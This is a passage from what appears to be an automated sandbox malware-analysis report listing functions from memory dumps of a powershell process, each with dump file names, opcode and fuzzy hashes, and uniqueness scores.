                              • Opcode ID: b83d6bdfc966fb8aee9f2dc22518951a2a2328a97a1bf26a6f784c44cfb3b3ef
                              • Instruction ID: 6e4f3de3db5b196a5ddfa5bac71dedf47961d2313e51ddc38f1a29d9aa16d277
                              • Opcode Fuzzy Hash: b83d6bdfc966fb8aee9f2dc22518951a2a2328a97a1bf26a6f784c44cfb3b3ef
                              • Instruction Fuzzy Hash: F531B072A102599FCB54DFA5C840AAFBBF6AF89300F108519F905BB340DB70AD45CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067679C0 Relevance: .1, Instructions: 94COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2b81a2c12c53c256ef2dfb33930d17824b710710a49ca6d56468019a109292eb
                              • Instruction ID: f0e2b3c162c9cc56333e5174d8e7dce720508ebc0a724fd4f80aed4d6f2056e6
                              • Opcode Fuzzy Hash: 2b81a2c12c53c256ef2dfb33930d17824b710710a49ca6d56468019a109292eb
                              • Instruction Fuzzy Hash: 7431D135B00205DFDB24CF7AD444A6AF7BAFF88319B148569E91983640D731E941CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676CA48 Relevance: .1, Instructions: 91COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 40dd5382898d701e36e0ba2cdeb1ffd79875ea052776a1366e3798179e5870a9
                              • Instruction ID: a9bf24af6004ac3d30b4c7472e061661a7cba81bac85800f54de4224f4718d99
                              • Opcode Fuzzy Hash: 40dd5382898d701e36e0ba2cdeb1ffd79875ea052776a1366e3798179e5870a9
                              • Instruction Fuzzy Hash: 65313B75D00659DFCB55CFA5C880ADEBBB2FF88300F10851AE819AB754D770A949CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676A178 Relevance: .1, Instructions: 87COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5beb934afab8ac30475ff1255a11683454e346ccde8ccb24633ed4fd924fa92b
                              • Instruction ID: 972ac66fd6795cd35cb366bcd2286e9f7842ae0efbd8b38c6ff95ee994452793
                              • Opcode Fuzzy Hash: 5beb934afab8ac30475ff1255a11683454e346ccde8ccb24633ed4fd924fa92b
                              • Instruction Fuzzy Hash: C431BF71E102599FCB54DFA6C840AAEBBF6AF89300F108519F805BB341DB70ED45CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06766C63 Relevance: .1, Instructions: 79COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3926b62ff8a5a31d166842902649d50a6a6b3abaafb339315a557e2624e78b26
                              • Instruction ID: e22d8e5bfc96da9e729c8f3ac33a274c5362d109b43ddd5ef636a211c35ed21b
                              • Opcode Fuzzy Hash: 3926b62ff8a5a31d166842902649d50a6a6b3abaafb339315a557e2624e78b26
                              • Instruction Fuzzy Hash: 1B212E326002119FCF549F56D8006FABBAAEF84648F14811EFD0A8B250C735EC19CBE2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676994A Relevance: .1, Instructions: 76COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ad54d83730cf368140d3d3e237e06717e5dc99fe6149f91e96042b3cdd77bbb5
                              • Instruction ID: e02dc5c52a8198aefe9a6893cb4daa4e1c57294ff4da519f2c432e72a623eb68
                              • Opcode Fuzzy Hash: ad54d83730cf368140d3d3e237e06717e5dc99fe6149f91e96042b3cdd77bbb5
                              • Instruction Fuzzy Hash: 95214B75A00215CFCB54EF65C558AEDBBF1AF88304F1540A9E906FB364DB359D05CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676A768 Relevance: .1, Instructions: 72COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8861c60e26c91984f34ed4d3be151af94d7556c45be49545d49624803727a7dd
                              • Instruction ID: 33d96d451d61d7b9ba7abfdf2f8c115b74f00c5cea6f1d899719bf7591d2ddd4
                              • Opcode Fuzzy Hash: 8861c60e26c91984f34ed4d3be151af94d7556c45be49545d49624803727a7dd
                              • Instruction Fuzzy Hash: 10219A31A003499FCB61CF19C844BEABBF2EF88304F18845AE959A7251D375A995CFE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06769012 Relevance: .1, Instructions: 69COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f71b6170f211c8105689d05afbbe8dce70e8888e01105976db9e97cfb31f1045
                              • Instruction ID: 644535a027b2bc57b8fa54d8a721516ef60ce5fb225e76db79a6f6b0079b60f5
                              • Opcode Fuzzy Hash: f71b6170f211c8105689d05afbbe8dce70e8888e01105976db9e97cfb31f1045
                              • Instruction Fuzzy Hash: 2521AF757012459FC710EF29D8849DDB7A2EF85204B40882DD4588F765EB35AD09CBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F15FDF Relevance: .1, Instructions: 69COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d214cf69382afc2cf4041e60710ff5db787afca32d307138f9a448f751227516
                              • Instruction ID: 80ebab28d5030860db9516e830e9648c6477287cdd490bb3197cadc01185a765
                              • Opcode Fuzzy Hash: d214cf69382afc2cf4041e60710ff5db787afca32d307138f9a448f751227516
                              • Instruction Fuzzy Hash: A9217C34A002099FD764EBB0D855BAE7777EF84349F508939C406AF784DF38A805CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676D890 Relevance: .1, Instructions: 68COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b245f5c7f5d5a00ec1f007282105c9c9250ee2fb634eb46e136a2af2600f7ff1
                              • Instruction ID: b983f2d1884820787766f6025013858c6e343c085ccbdc513321a2cf409f5201
                              • Opcode Fuzzy Hash: b245f5c7f5d5a00ec1f007282105c9c9250ee2fb634eb46e136a2af2600f7ff1
                              • Instruction Fuzzy Hash: 0511C434B153448FC709ABB998284AA7BE79F8A10130544EBE809CB7A1DE34CD05C7A2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067679B3 Relevance: .1, Instructions: 66COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a48b0c9beab3c5ec64518737db7e0273085e9b881330608c776183cb57b1e92b
                              • Instruction ID: 1465638249b4fb273053ccad9fea4aba4c5a3f5d0deee52fe994e7d864e03ed3
                              • Opcode Fuzzy Hash: a48b0c9beab3c5ec64518737db7e0273085e9b881330608c776183cb57b1e92b
                              • Instruction Fuzzy Hash: BA11D074700302EFDB68CF76C880A77BBBAFF84258B148569E91887341D735E951CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06769020 Relevance: .1, Instructions: 64COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 144e9229766b95d09c5fc1d65d7d8101edd23d535036824b3ea328a2985d1084
                              • Instruction ID: 13f82e967e1c2fc9803592a283b24a694e7a21019f5b2e652c3ff066d181d20b
                              • Opcode Fuzzy Hash: 144e9229766b95d09c5fc1d65d7d8101edd23d535036824b3ea328a2985d1084
                              • Instruction Fuzzy Hash: 4021AE756002459FCB50EF6AD8849DEB7E1EF85208B40882DE4588F765EB34ED09CBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067680F7 Relevance: .1, Instructions: 63COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 96642cf006089f6ef2eed1c1e32d2a79a495a281d1ced9892aa87a3862755863
                              • Instruction ID: 1d6ede0969b0272647cbdf5cac7f5989469d73550defda65d265d9210f99211d
                              • Opcode Fuzzy Hash: 96642cf006089f6ef2eed1c1e32d2a79a495a281d1ced9892aa87a3862755863
                              • Instruction Fuzzy Hash: DB216335A002089FDB58EFA5D8586EEBFFAEF89210F54502DE816FB341CA715841CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F1FF48 Relevance: .1, Instructions: 60COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: aec924cc1ad89e39333f7e86662fd8a8a9311308338589e97c50853cc8c5183e
                              • Instruction ID: 035e09854f09cec451da4d8d1f55e32a6f085ddc2847f5fd29a65dad1a252b2e
                              • Opcode Fuzzy Hash: aec924cc1ad89e39333f7e86662fd8a8a9311308338589e97c50853cc8c5183e
                              • Instruction Fuzzy Hash: 340128707043149FE704EB28C814BA6BBDAEB85344F14C2A9E209CF3C2DAB49C44C7E1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067686D0 Relevance: .1, Instructions: 57COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3f95d311eb566fc46a21534b61f4467d0906fbabb187a2a8c8815ca98f9ec5d8
                              • Instruction ID: 1285b5651e09441d556c22c387f0bf7944fa37b3cc66593b6a81eb5a2e149f2e
                              • Opcode Fuzzy Hash: 3f95d311eb566fc46a21534b61f4467d0906fbabb187a2a8c8815ca98f9ec5d8
                              • Instruction Fuzzy Hash: FC116071A00209AFDF44CFA6E840AEEBFF6AF49310F148029F814B7250DB309945CBB2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676DF72 Relevance: .1, Instructions: 55COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e5d8580027601aea96c2d62ea3ef406f65f52a30f210988a8d0161c777ebdf86
                              • Instruction ID: f9194848867b16ce5b1466941f157362567c4b1ca3798506a4d3b6f8ca539d62
                              • Opcode Fuzzy Hash: e5d8580027601aea96c2d62ea3ef406f65f52a30f210988a8d0161c777ebdf86
                              • Instruction Fuzzy Hash: 0D113775A142599FDB14CF65C908AEABBF2AF8C311F148469FC11A7391CB75D940CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676DF78 Relevance: .1, Instructions: 54COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ae4ab070ab181220ad5276578399a3a4e9175b484c64840965e13f646f8a9aec
                              • Instruction ID: 97d54705bf9c11fcffb56123f39b2300e87112941fa10371acebe6055b0c6d56
                              • Opcode Fuzzy Hash: ae4ab070ab181220ad5276578399a3a4e9175b484c64840965e13f646f8a9aec
                              • Instruction Fuzzy Hash: 13114970A142598FDB14CF66C908AEEBBF2BF8C310F148469F811A7390DB75D940CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676A4F0 Relevance: .1, Instructions: 53COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a38149b13419b3996cedeac22b3d15aaf3c7d98251474e9966b1e2585f09eecc
                              • Instruction ID: 9287d215afdebc2313345b0344637ba5a931ac749b61c8b634c7c989eee576f6
                              • Opcode Fuzzy Hash: a38149b13419b3996cedeac22b3d15aaf3c7d98251474e9966b1e2585f09eecc
                              • Instruction Fuzzy Hash: 53114F75100741AFC364EF29D8409CA77A2EF81308B048E6EC0599FA69EBA5B94C87F5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F15087 Relevance: .1, Instructions: 52COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bbf0fe7449f67d75a4095bb8608654c0a7f5301c8b470a4effa6341a97675df5
                              • Instruction ID: 3e7705e90b0662328b4fe985f040a8afa7c30d3c328ff71d48229e7842030c53
                              • Opcode Fuzzy Hash: bbf0fe7449f67d75a4095bb8608654c0a7f5301c8b470a4effa6341a97675df5
                              • Instruction Fuzzy Hash: 98F028326052549FCB199A7CDC5A4EE77B6EBC9211F14027BD502D7700DE3299168B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F1F0B0 Relevance: .1, Instructions: 51COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c03c563f4ad09a75be87e9d158a0bf7ee30f65c035fb74bdee570cee19b89d93
                              • Instruction ID: ecebf5c6e49e1b827bd8b3661c9a5c5329ebf38e3f26a4754cdba4b27cadfaa0
                              • Opcode Fuzzy Hash: c03c563f4ad09a75be87e9d158a0bf7ee30f65c035fb74bdee570cee19b89d93
                              • Instruction Fuzzy Hash: 9E0126392012908FC755EB75D554ADB37E6DF89255F40006EE406CF761DF34ED0587A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 067686E0 Relevance: .0, Instructions: 47COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 66e7638c203ecf8c38d97ca78efba94c1c30d913f4706f07a19ebaf7c2524e91
                              • Instruction ID: 9a5662f3fdea2a3e98294341d30170006ffb9efd1c0cd6c91fdf940bae99a3ac
                              • Opcode Fuzzy Hash: 66e7638c203ecf8c38d97ca78efba94c1c30d913f4706f07a19ebaf7c2524e91
                              • Instruction Fuzzy Hash: 99112A71E0021DAFDB45CFA6D854AEEBBB6AF48210F14802AF814B7250DB709944CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676E150 Relevance: .0, Instructions: 46COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 461c38b113d576e49e2c51c5d76e0e2860be0506f776c8be12c77bc4258ed0aa
                              • Instruction ID: 09aae112ef936a68c1b6678d6ea0553d8ba72a5db56b884c62d94c7e94523d66
                              • Opcode Fuzzy Hash: 461c38b113d576e49e2c51c5d76e0e2860be0506f776c8be12c77bc4258ed0aa
                              • Instruction Fuzzy Hash: 4F01D6357043109FC3199B2AD848AAAB7AADBC5210F14417AF5088B2A1CB348D51DBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0347D006 Relevance: .0, Instructions: 45COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.430329594.000000000347D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0347D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_347d000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 98b6cfe7417de7b9a241b1257be4a460bec7ae4703ea7980ff256555ca256d0b
                              • Instruction ID: 705e33a6ef94b11234912c02b8aec8cd43c06f7399fd3c6e0d868fdb0af94c56
                              • Opcode Fuzzy Hash: 98b6cfe7417de7b9a241b1257be4a460bec7ae4703ea7980ff256555ca256d0b
                              • Instruction Fuzzy Hash: 6601D7614093C09ED7128B258894B92BFB8EF43268F1D85DBD9859F2A3C2699848C776
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0347D01D Relevance: .0, Instructions: 45COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.430329594.000000000347D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0347D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_347d000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0819705df976c5eaef6807999f32289dc6afdf1580eefd922c60e8a133139f45
                              • Instruction ID: 23870d85b2e841361f1fb34b1199319212a5ce488cfad2aabf7520beabbaa85b
                              • Opcode Fuzzy Hash: 0819705df976c5eaef6807999f32289dc6afdf1580eefd922c60e8a133139f45
                              • Instruction Fuzzy Hash: 4A01B1718142809EEB208A25CC847E3BF98EF4226CF08945AE8155F342C3799445C6B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F1FF38 Relevance: .0, Instructions: 44COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c03577645b5386ee21dfbb57dbeab4d53f9e23bc73dc3f2ffccbdf5c3ad3ab58
                              • Instruction ID: abf4d1f0ac405a5aa427f101f2045b6fca36d0c1e42597ca543b43ce9418cbc5
                              • Opcode Fuzzy Hash: c03577645b5386ee21dfbb57dbeab4d53f9e23bc73dc3f2ffccbdf5c3ad3ab58
                              • Instruction Fuzzy Hash: 94F0A47021A3515FE315DA289C11BD2BF9AAB82754F09C299F2088F2D3DAB59D44C7E1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676D92C Relevance: .0, Instructions: 43COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dc0abd4c7433df6cbcefa4ece95f7daaf97164eaa32cce6862387c1d570c764c
                              • Instruction ID: e4632460ae6d7bb4efc25a35cf53ec57012f3a4bfc397a269fa12e348bcc3877
                              • Opcode Fuzzy Hash: dc0abd4c7433df6cbcefa4ece95f7daaf97164eaa32cce6862387c1d570c764c
                              • Instruction Fuzzy Hash: C4F0FF6232D3908FC31A477A88254957FA5DE8B00034601CBF485CB2B2D619CD05CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F1F688 Relevance: .0, Instructions: 42COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0c38e7eb18a9effc7af8943bcae228d1519eeecdd0a257a9fdaf065f56846e88
                              • Instruction ID: deb45b9255a789ab5e6b6ea0dac1a2db4ae283ff99b2a6a6e113db5ce26e3c4a
                              • Opcode Fuzzy Hash: 0c38e7eb18a9effc7af8943bcae228d1519eeecdd0a257a9fdaf065f56846e88
                              • Instruction Fuzzy Hash: B6F04C323092545FD7015BEA98488AA7FBAEBCA151308406FF505CB652CB748C06D7B1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F1570A Relevance: .0, Instructions: 40COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2303463546b1e82ebb2a4af1e3a3579746448248d53928533ae80521ec65e6f5
                              • Instruction ID: ca230561846d3ed35f750ba57158ea927816856422aed5ea4a9b71cab39b048b
                              • Opcode Fuzzy Hash: 2303463546b1e82ebb2a4af1e3a3579746448248d53928533ae80521ec65e6f5
                              • Instruction Fuzzy Hash: 16011233104289AFCF52AF95DC01CCA3F76EF89654B499559FA0446630D632E865EBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06F1F050 Relevance: .0, Instructions: 40COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 20eacf79bdd581ce552481f80f08d30a3a07493ac226214a78b1ce77284ecd51
                              • Instruction ID: e5540af42774ad018f2891da25cca66343b8b8e90c6bddebe05af72f5292c03a
                              • Opcode Fuzzy Hash: 20eacf79bdd581ce552481f80f08d30a3a07493ac226214a78b1ce77284ecd51
                              • Instruction Fuzzy Hash: DCF0903411E3D04FD307D736DC659EA3B75DF4725070541E7E805CB267CA294D0587A2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676A36A Relevance: .0, Instructions: 39COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 066f592b8520a0ba190b057b978c956c89b50246cb2ae37f7623915c6b125b08
                              • Instruction ID: 96ad424c68a9e322db0d3d3a435888011f5c3f9455c95f11f9b07d8ea286c49d
                              • Opcode Fuzzy Hash: 066f592b8520a0ba190b057b978c956c89b50246cb2ae37f7623915c6b125b08
                              • Instruction Fuzzy Hash: 4201AD74A002069FDB05DFB0D8586EE73B6FB8130AF02997A9115AF794EF3859058BE4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676DF57 Relevance: .0, Instructions: 39COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0c7a8f559c18db5abb071718d4c16315b8a5f57a909b61777e3e64bdf09bc997
                              • Instruction ID: 1221323b0bb665371da427d48dd1cd726f7f4785a7f23f986799bc91e7f1c0f4
                              • Opcode Fuzzy Hash: 0c7a8f559c18db5abb071718d4c16315b8a5f57a909b61777e3e64bdf09bc997
                              • Instruction Fuzzy Hash: 94118470A18385DFDB56CF61C854BAA7FB2BF49210F188499F851DB262CB79C844CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 06769A5F Relevance: .0, Instructions: 39COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7b013b301cf03982f5e02abeeda2c5aa15ddf8f12884673918d39ee4affacc33
                              • Instruction ID: 78857ad1ff0171892759cc5bd70f67fe0da3c09819ed6e0183a7037421387cf4
                              • Opcode Fuzzy Hash: 7b013b301cf03982f5e02abeeda2c5aa15ddf8f12884673918d39ee4affacc33
                              • Instruction Fuzzy Hash: CF01BC79700215AFCF19EF64D8008DCB362FB88216B01862AC9016B740DB38AC0ADBE5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676C2AC Relevance: .0, Instructions: 37COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b82d4eede7668dc8632ac2115183e73ca08bfb4885e259c9c9f7950fcb18a70b
                              • Instruction ID: 610446483c8f220a890c6cb62c9993fe4cec26066c789f8a089be302fe96a4c2
                              • Opcode Fuzzy Hash: b82d4eede7668dc8632ac2115183e73ca08bfb4885e259c9c9f7950fcb18a70b
                              • Instruction Fuzzy Hash: C7018C3AA041589FCB41DF98E8848DEFBF1EF88261B04C096FD65A7201C331EA20CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0676B320 Relevance: .0, Instructions: 35COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
